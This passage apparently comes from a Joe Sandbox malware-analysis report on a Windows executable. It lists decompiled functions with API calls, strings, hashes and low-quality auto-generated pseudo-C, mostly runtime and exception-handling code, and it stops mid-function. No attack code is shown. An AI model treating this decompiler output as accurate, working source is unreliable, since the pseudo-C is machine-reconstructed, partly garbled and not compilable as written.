String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 3723044601-876015163
Opcode ID: 92c20d544a3da61e5b294facc47a8b8ec1f934979f76716e8c9c135b6086c3a3
Instruction ID: 4ee42b84989f1e7fa71373c33a3489ee2cc6d54337d415c6146055f499a284bc
Opcode Fuzzy Hash: 92c20d544a3da61e5b294facc47a8b8ec1f934979f76716e8c9c135b6086c3a3
Instruction Fuzzy Hash: A5216122B08A4381FB12EB15F40016DE361FB947D4FD84572DE4C87B6AEF6CD6658710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EA570 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA57F
FlsGetValue.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA594
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA5B5
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA5E2
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA5F3
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA604
SetLastError.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA61F

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: d29b967d13e30a0aaf5ff83cba9b665355429f5f41d95fa9997d3a9b9b9948ed
Instruction ID: 5f63456b71583ef3aff6cd944f77ea2d5d3eac19fbbe4a74dd8531042abfa870
Opcode Fuzzy Hash: d29b967d13e30a0aaf5ff83cba9b665355429f5f41d95fa9997d3a9b9b9948ed
Instruction Fuzzy Hash: EE215C60E08202C1FA6AB761558517DE2417F64BB0FC40AB6ED3E47AD7DE2EE5618220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F6FBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7DA8F6FED
GetLastError.KERNEL32 ref: 00007FF7DA8F6FF9
CloseHandle.KERNEL32 ref: 00007FF7DA8F7011
CreateFileW.KERNEL32 ref: 00007FF7DA8F703C
WriteConsoleW.KERNEL32 ref: 00007FF7DA8F705B

Strings

CONOUT$, xrefs: 00007FF7DA8F701D

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: f4124709c7c31d5de308cd59126671bcd46a61d9362fadabbe7fbbd0d2697edd
Instruction ID: e1b7652dedd7bd3204d68097532ef3e51691d90434d21077f63cb91e90bd4d8f
Opcode Fuzzy Hash: f4124709c7c31d5de308cd59126671bcd46a61d9362fadabbe7fbbd0d2697edd
Instruction Fuzzy Hash: 9611AC22A18A4386F751AB02E85432DF3A0BB98FE4FC00276EE5D87795DF3CD8648754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EA6E8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7DA8E439D,?,?,?,?,00007FF7DA8EDCF7,?,?,00000000,00007FF7DA8EA806,?,?,?), ref: 00007FF7DA8EA6F7
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E439D,?,?,?,?,00007FF7DA8EDCF7,?,?,00000000,00007FF7DA8EA806,?,?,?), ref: 00007FF7DA8EA72D
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E439D,?,?,?,?,00007FF7DA8EDCF7,?,?,00000000,00007FF7DA8EA806,?,?,?), ref: 00007FF7DA8EA75A
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E439D,?,?,?,?,00007FF7DA8EDCF7,?,?,00000000,00007FF7DA8EA806,?,?,?), ref: 00007FF7DA8EA76B
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E439D,?,?,?,?,00007FF7DA8EDCF7,?,?,00000000,00007FF7DA8EA806,?,?,?), ref: 00007FF7DA8EA77C
SetLastError.KERNEL32(?,?,?,00007FF7DA8E439D,?,?,?,?,00007FF7DA8EDCF7,?,?,00000000,00007FF7DA8EA806,?,?,?), ref: 00007FF7DA8EA797

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 15f8d115e08a0785f153da3630b41f43a9b11f7c39ba558ca675a4718144fc33
Instruction ID: dbaa6690ce344b50398efa717dee32f171f72c75cb6f435dcfa3d106402fa939
Opcode Fuzzy Hash: 15f8d115e08a0785f153da3630b41f43a9b11f7c39ba558ca675a4718144fc33
Instruction Fuzzy Hash: 40118064F08202C1F65AB7215A4013DE2917FA4BB0FC44AB6ED7E477C7DD2DA5658220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DE3C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00007FF77FF7DA8DE3C4(void* __ecx, void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t60;
				signed int _t102;
				void* _t110;
				intOrPtr _t112;
				signed int* _t116;
				intOrPtr* _t137;
				void* _t140;
				void* _t143;
				void* _t145;
				void* _t159;
				void* _t160;

				_t110 = _t145;
				 *((long long*)(_t110 + 8)) = __rbx;
				 *((long long*)(_t110 + 0x10)) = __rbp;
				 *((long long*)(_t110 + 0x18)) = __rsi;
				 *((long long*)(_t110 + 0x20)) = __rdi;
				_t137 = __rcx;
				_t140 = __r9;
				_t160 = __r8;
				_t143 = __rdx;
				E00007FF77FF7DA8DCC24(_t55, __r8);
				E00007FF77FF7DA8DCC80(_t110);
				_t116 = _a40;
				if ( *((intOrPtr*)(_t110 + 0x40)) != 0) goto 0xda8de446;
				if ( *__rcx == 0xe06d7363) goto 0xda8de446;
				if ( *__rcx != 0x80000029) goto 0xda8de42a;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0xda8de42e;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0xda8de446;
				if ( *__rcx == 0x80000026) goto 0xda8de446;
				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0xda8de446;
				if ((_t116[9] & 0x00000001) != 0) goto 0xda8de5d5;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0xda8de4de;
				if (_t116[1] == 0) goto 0xda8de5d5;
				if (_a48 != 0) goto 0xda8de5d5;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0xda8de4cb;
				if ( *__rcx != 0x80000026) goto 0xda8de4a9;
				_t60 = E00007FF77FF7DA8DD794(_t116, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t60 - 0xffffffff < 0) goto 0xda8de5f5;
				if (_t60 - _t116[1] >= 0) goto 0xda8de5f5;
				r9d = _t60;
				E00007FF77FF7DA8DE964(_t110, _t143, __r9, _t116);
				goto 0xda8de5d5;
				if ( *_t137 != 0x80000029) goto 0xda8de4cb;
				r9d =  *((intOrPtr*)(_t137 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0xda8de5f5;
				if (r9d - _t116[1] >= 0) goto 0xda8de5f5;
				goto 0xda8de499;
				E00007FF77FF7DA8DD20C(r9d - _t116[1], _t110, _t116, __r9, __r9, _t116);
				goto 0xda8de5d5;
				if (_t116[3] != 0) goto 0xda8de526;
				if (( *_t116 & 0x1fffffff) - 0x19930521 < 0) goto 0xda8de506;
				_t102 = _t116[8];
				if (_t102 == 0) goto 0xda8de506;
				E00007FF77FF7DA8DD610(_t110);
				if (_t102 != 0) goto 0xda8de526;
				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0xda8de5d5;
				if ((_t116[9] >> 0x00000002 & 0x00000001) == 0) goto 0xda8de5d5;
				if ( *_t137 != 0xe06d7363) goto 0xda8de59c;
				if ( *((intOrPtr*)(_t137 + 0x18)) - 3 < 0) goto 0xda8de59c;
				if ( *((intOrPtr*)(_t137 + 0x20)) - 0x19930522 <= 0) goto 0xda8de59c;
				_t112 =  *((intOrPtr*)(_t137 + 0x30));
				if ( *((intOrPtr*)(_t112 + 8)) == 0) goto 0xda8de59c;
				E00007FF77FF7DA8DD624(_t112);
				if (_t112 +  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x30)) + 8)) == 0) goto 0xda8de59c;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t116;
				 *0xda8fa428(_t159);
				goto 0xda8de5da;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t116;
				E00007FF77FF7DA8DDB90(_a64 & 0x000000ff, 0x80000026, __esi, _t137, _t143, _t160, _t140, _t112 +  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x30)) + 8)));
				return 1;
			}

0x7ff7da8de3c4
0x7ff7da8de3c7
0x7ff7da8de3cb
0x7ff7da8de3cf
0x7ff7da8de3d3
0x7ff7da8de3dd
0x7ff7da8de3e0
0x7ff7da8de3e6
0x7ff7da8de3e9
0x7ff7da8de3ec
0x7ff7da8de3f1
0x7ff7da8de3f6
0x7ff7da8de40c
0x7ff7da8de414
0x7ff7da8de418
0x7ff7da8de41e
0x7ff7da8de428
0x7ff7da8de42c
0x7ff7da8de43a
0x7ff7da8de440
0x7ff7da8de44a
0x7ff7da8de454
0x7ff7da8de462
0x7ff7da8de46c
0x7ff7da8de470
0x7ff7da8de47c
0x7ff7da8de484
0x7ff7da8de48d
0x7ff7da8de493
0x7ff7da8de49f
0x7ff7da8de4a4
0x7ff7da8de4ab
0x7ff7da8de4ad
0x7ff7da8de4b5
0x7ff7da8de4bf
0x7ff7da8de4c9
0x7ff7da8de4d4
0x7ff7da8de4d9
0x7ff7da8de4e2
0x7ff7da8de4f0
0x7ff7da8de4f2
0x7ff7da8de4f6
0x7ff7da8de4f8
0x7ff7da8de504
0x7ff7da8de512
0x7ff7da8de520
0x7ff7da8de52c
0x7ff7da8de532
0x7ff7da8de53b
0x7ff7da8de53d
0x7ff7da8de545
0x7ff7da8de547
0x7ff7da8de55a
0x7ff7da8de571
0x7ff7da8de580
0x7ff7da8de588
0x7ff7da8de58f
0x7ff7da8de594
0x7ff7da8de59a
0x7ff7da8de5a7
0x7ff7da8de5b9
0x7ff7da8de5c7
0x7ff7da8de5cb
0x7ff7da8de5d0
0x7ff7da8de5f4

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7DA8DE3EC
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF7DA8DE4D4
__std_exception_copy.LIBVCRUNTIME ref: 00007FF7DA8DE620

Strings

csm, xrefs: 00007FF7DA8DE526
csm, xrefs: 00007FF7DA8DE40E

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
String ID: csm$csm
API String ID: 851805269-3733052814
Opcode ID: 636783574853e9e9a3fb0730e5a08b6ac18183820e0ce6080361bfa48fa937f4
Instruction ID: 5a19739b57951671574e95ecf06ce7e6fdd3bdc19f8b9e2c6cb3877583a7ebf1
Opcode Fuzzy Hash: 636783574853e9e9a3fb0730e5a08b6ac18183820e0ce6080361bfa48fa937f4
Instruction Fuzzy Hash: AC619D329087828AFF21AF21944426CBBA1FB54B94FD84172DE8D47B96DF3CE460C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DC808 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00007FF77FF7DA8DC808(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t76;
				void* _t83;
				void* _t84;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t113;
				void* _t118;
				void* _t130;
				long long _t133;
				intOrPtr* _t135;
				signed long long _t144;
				void* _t150;
				signed long long _t154;
				void* _t156;
				long long _t158;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				signed long long _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t180;
				intOrPtr* _t181;

				_t130 = __rax;
				 *((long long*)(_t161 + 8)) = __rbx;
				 *((long long*)(_t161 + 0x10)) = _t158;
				 *((long long*)(_t161 + 0x18)) = __rsi;
				_t162 = _t161 - 0x40;
				_t159 = __rcx;
				_t181 = __r9;
				_t174 = __rdx;
				E00007FF77FF7DA8DCC24(_t76, __r8);
				_t171 =  *((intOrPtr*)(__r9 + 8));
				_t135 =  *((intOrPtr*)(__r9 + 0x38));
				_t178 =  *__r9 - _t171;
				_t103 =  *((intOrPtr*)(__r9 + 0x48));
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0xda8dc930;
				 *((long long*)(_t162 + 0x30)) = __rcx;
				 *((long long*)(_t162 + 0x38)) = __r8;
				if (_t103 -  *_t135 >= 0) goto 0xda8dc9dc;
				_t154 = __r8 + __r8;
				if (_t178 - _t130 < 0) goto 0xda8dc922;
				if (_t178 - _t130 >= 0) goto 0xda8dc922;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0xda8dc922;
				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0xda8dc8ae;
				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
				if (_t113 < 0) goto 0xda8dc929;
				if (_t113 <= 0) goto 0xda8dc922;
				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0xda8dc8df;
				if ( *0xda9004c0 == 0) goto 0xda8dc8df;
				if (E00007FF77FF7DA8F8F10(_t130 + _t171, _t135, 0xda9004c0) == 0) goto 0xda8dc8df;
				_t83 =  *0xda9004c0();
				r8d = 1;
				_t84 = E00007FF77FF7DA8DCBF0(_t83, _t159 + _t171, _t174);
				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
				r9d =  *_t159;
				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
				_t133 =  *((intOrPtr*)(_t181 + 0x28));
				 *((long long*)(_t162 + 0x20)) = _t133;
				__imp__RtlUnwindEx();
				E00007FF77FF7DA8DCC20(_t84);
				goto 0xda8dc85e;
				goto 0xda8dc9e1;
				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
				goto 0xda8dc9d2;
				_t144 = _t174 + _t174;
				if (_t178 - _t133 < 0) goto 0xda8dc9d0;
				_t118 = _t178 - _t133;
				if (_t118 >= 0) goto 0xda8dc9d0;
				r10d =  *(_t159 + 4);
				r10d = r10d & 0x00000020;
				if (_t118 == 0) goto 0xda8dc9a5;
				r9d = 0;
				if (_t101 == 0) goto 0xda8dc9a0;
				r8d = r9d;
				_t166 = _t159 + _t159;
				if (_t156 - _t133 < 0) goto 0xda8dc998;
				if (_t156 - _t133 >= 0) goto 0xda8dc998;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0xda8dc998;
				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0xda8dc9a0;
				r9d = r9d + 1;
				if (r9d - _t101 < 0) goto 0xda8dc968;
				if (r9d != _t101) goto 0xda8dc9dc;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0xda8dc9b9;
				if (_t156 != _t133) goto 0xda8dc9d0;
				if (r10d != 0) goto 0xda8dc9dc;
				goto 0xda8dc9d0;
				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
				 *((long long*)(_t166 + _t171))();
				if (_t103 + 2 -  *_t135 < 0) goto 0xda8dc93c;
				return 1;
			}

0x7ff7da8dc808
0x7ff7da8dc808
0x7ff7da8dc80d
0x7ff7da8dc812
0x7ff7da8dc820
0x7ff7da8dc824
0x7ff7da8dc827
0x7ff7da8dc830
0x7ff7da8dc833
0x7ff7da8dc838
0x7ff7da8dc83f
0x7ff7da8dc843
0x7ff7da8dc84a
0x7ff7da8dc84e
0x7ff7da8dc854
0x7ff7da8dc859
0x7ff7da8dc860
0x7ff7da8dc868
0x7ff7da8dc872
0x7ff7da8dc87f
0x7ff7da8dc88a
0x7ff7da8dc895
0x7ff7da8dc8a8
0x7ff7da8dc8aa
0x7ff7da8dc8ac
0x7ff7da8dc8b5
0x7ff7da8dc8bf
0x7ff7da8dc8cf
0x7ff7da8dc8d9
0x7ff7da8dc8e3
0x7ff7da8dc8ef
0x7ff7da8dc8fb
0x7ff7da8dc902
0x7ff7da8dc909
0x7ff7da8dc90e
0x7ff7da8dc912
0x7ff7da8dc917
0x7ff7da8dc91d
0x7ff7da8dc924
0x7ff7da8dc92b
0x7ff7da8dc934
0x7ff7da8dc937
0x7ff7da8dc93e
0x7ff7da8dc948
0x7ff7da8dc952
0x7ff7da8dc955
0x7ff7da8dc957
0x7ff7da8dc95b
0x7ff7da8dc95f
0x7ff7da8dc961
0x7ff7da8dc966
0x7ff7da8dc968
0x7ff7da8dc96b
0x7ff7da8dc976
0x7ff7da8dc980
0x7ff7da8dc98b
0x7ff7da8dc996
0x7ff7da8dc998
0x7ff7da8dc99e
0x7ff7da8dc9a3
0x7ff7da8dc9ab
0x7ff7da8dc9b0
0x7ff7da8dc9b5
0x7ff7da8dc9b7
0x7ff7da8dc9bf
0x7ff7da8dc9c3
0x7ff7da8dc9cd
0x7ff7da8dc9d6
0x7ff7da8dc9fe

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7DA8DC833
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7DA8DC8C8
RtlUnwindEx.KERNEL32 ref: 00007FF7DA8DC917

Strings

f, xrefs: 00007FF7DA8DC846
csm, xrefs: 00007FF7DA8DC8AE

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 7f3794147224920763e08c17acf18a5c560d4a612554ab5faf8e71f29923e20f
Instruction ID: d86f09aefdc4c76ecc180d5bff5aea34767b59c0ecd124acaf2e1c6840482ecd
Opcode Fuzzy Hash: 7f3794147224920763e08c17acf18a5c560d4a612554ab5faf8e71f29923e20f
Instruction Fuzzy Hash: 1951E472A096029EFF56EB25E400A2DB395FB40B88FD88172DE4E5374ADF38E8518714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D2240 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00007FF77FF7DA8D2240(void* __ebx, void* __rax, void* __rcx, void* __rdx, void* __r8) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed long long _t53;
				signed long long _t54;
				void* _t56;
				void* _t75;
				void* _t77;
				void* _t78;
				signed long long _t79;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;

				_t77 = _t78 - 0x20d0;
				E00007FF77FF7DA8DAD20(0x21d0, __rax, _t85, _t86);
				_t79 = _t78 - __rax;
				_t53 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t54 = _t53 ^ _t79;
				 *(_t77 + 0x20c0) = _t54;
				_t56 = __rcx;
				_t87 = __r8;
				_t75 = __rdx;
				GetModuleHandleW(??);
				r8d = 0x102;
				E00007FF77FF7DA8DC170();
				 *((intOrPtr*)(_t77 + 0x1fa0)) = 0x90cc0884;
				 *((long long*)(_t77 + 0x1fa4)) = _t77 + 0x1fb6;
				 *((short*)(_t77 + 0x1fb4)) = 0;
				 *((intOrPtr*)(_t77 + 0x1fac)) = 0xc80000;
				 *((intOrPtr*)(_t77 + 0x1fb0)) = 0x96;
				E00007FF77FF7DA8D2470(_t54, _t77 + 0x1fb6, __rdx, L"Unhandled exception in script", _t83);
				 *(_t79 + 0x38) = _t54;
				r8d = 0x2040;
				E00007FF77FF7DA8DC170();
				 *(_t79 + 0x30) = _t54;
				E00007FF77FF7DA8E5E94(_t54, _t56, _t56, _t54, _t77);
				 *(_t79 + 0x40) = _t54;
				E00007FF77FF7DA8E5E94(_t54, _t56, _t75, _t54, _t77);
				 *(_t79 + 0x48) = _t54;
				E00007FF77FF7DA8E5E94(_t54, _t56, _t87, _t54, _t77);
				 *(_t79 + 0x50) = _t54;
				r8d = 0;
				 *((long long*)(_t79 + 0x20)) = _t79 + 0x30;
				DialogBoxIndirectParamW(??, ??, ??, ??, ??);
				E00007FF77FF7DA8E3FEC(0,  *(_t79 + 0x40), _t77 + 0x1fa0, L"Unhandled exception in script");
				E00007FF77FF7DA8E3FEC(0,  *(_t79 + 0x48), _t77 + 0x1fa0, L"Unhandled exception in script");
				E00007FF77FF7DA8E3FEC(0,  *(_t79 + 0x50), _t77 + 0x1fa0, L"Unhandled exception in script");
				if ( *((intOrPtr*)(_t77 + 0x1f78)) == 0) goto 0xda8d2375;
				DeleteObject(??);
				if ( *((intOrPtr*)(_t77 + 0x1f80)) == 0) goto 0xda8d2387;
				DestroyIcon(??);
				return E00007FF77FF7DA8DACF0(__ebx, 0,  *(_t77 + 0x20c0) ^ _t79);
			}

0x7ff7da8d2247
0x7ff7da8d2254
0x7ff7da8d2259
0x7ff7da8d225c
0x7ff7da8d2263
0x7ff7da8d2266
0x7ff7da8d226d
0x7ff7da8d2270
0x7ff7da8d2275
0x7ff7da8d2278
0x7ff7da8d2287
0x7ff7da8d2290
0x7ff7da8d2297
0x7ff7da8d22a1
0x7ff7da8d22af
0x7ff7da8d22b6
0x7ff7da8d22c3
0x7ff7da8d22d4
0x7ff7da8d22e2
0x7ff7da8d22e7
0x7ff7da8d22ed
0x7ff7da8d22f5
0x7ff7da8d22fa
0x7ff7da8d2302
0x7ff7da8d2307
0x7ff7da8d230f
0x7ff7da8d2314
0x7ff7da8d2319
0x7ff7da8d232a
0x7ff7da8d2334
0x7ff7da8d233c
0x7ff7da8d234a
0x7ff7da8d2354
0x7ff7da8d235e
0x7ff7da8d236d
0x7ff7da8d236f
0x7ff7da8d237f
0x7ff7da8d2381
0x7ff7da8d23a5

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00007FF7DA8D242F), ref: 00007FF7DA8D2278
DialogBoxIndirectParamW.USER32 ref: 00007FF7DA8D233C
DeleteObject.GDI32 ref: 00007FF7DA8D236F
DestroyIcon.USER32 ref: 00007FF7DA8D2381

Strings

Unhandled exception in script, xrefs: 00007FF7DA8D22A8

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 434f8413e3fdcd058a02a6b358131063f60b089ffb24758142b7acd9199934e8
Instruction ID: f8043560eada4e58eb0451c7882d38c1470269d90229690d852bb8d0fe82ef41
Opcode Fuzzy Hash: 434f8413e3fdcd058a02a6b358131063f60b089ffb24758142b7acd9199934e8
Instruction Fuzzy Hash: 5D317A32A08A8289FB25EB61E8441EDA360FF88794FC40176EE4D4BA5ADF3CD655C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D2620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00007FF77FF7DA8D2620(void* __eflags, void* __rax, long long __rcx, signed long long __rdx, long long __r8, long long __r9, long long _a8, signed long long _a16, char _a24, long long _a32, char _a1048, char _a2072, char _a4120, signed int _a6168, intOrPtr _a6224, char _a6232) {
				void* __rbx;
				void* __rsi;
